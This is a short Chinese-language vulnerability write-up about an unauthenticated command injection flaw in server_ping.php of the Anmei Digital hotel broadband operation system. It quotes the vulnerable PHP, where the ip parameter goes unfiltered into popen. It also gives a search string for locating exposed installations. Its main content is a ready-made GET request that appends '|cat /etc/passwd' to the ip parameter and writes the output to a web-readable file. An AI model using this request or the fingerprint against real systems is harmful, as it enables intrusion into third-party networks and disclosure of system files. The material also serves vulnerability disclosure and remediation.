# 安美数字 酒店宽带运营系统 server_ping.php 远程命令执行漏洞 # 漏洞描述 安美数字 酒店宽带运营系统 server_ping.php 存在远程命令执行漏洞,漏洞文件中ip参数未过滤造成命令执行 ## 漏洞影响 安美数字 酒店宽带运营系统 ## 网络测绘 "酒店宽带运营" ## 漏洞复现 登录页面如下 ![img](/library/img/watermark,image_c2h1aXlpbi9zdWkucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTQvYnJpZ2h0LC0zOS9jb250cmFzdCwtNjQ,g_se,t_17,x_1,y_10-20220313150127894.png) 存在漏洞的文件为 `server_ping.php` ```php \n"; } else { echo "\n"; } ?> ``` ```plain $cmd = "ping -c 2 -s 65 $ip"; $fp = popen($cmd, "r"); ``` GET传入 `$ip参数` 后直接命令执行,并且文件无权限要求 请求包为 ```plain GET /manager/radius/server_ping.php?ip=127.0.0.1|cat%20/etc/passwd>/library/test.txt&id=1 HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 ``` ![img](/library/img/watermark,image_c2h1aXlpbi9zdWkucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTQvYnJpZ2h0LC0zOS9jb250cmFzdCwtNjQ,g_se,t_17,x_1,y_10-20220313150127920.png)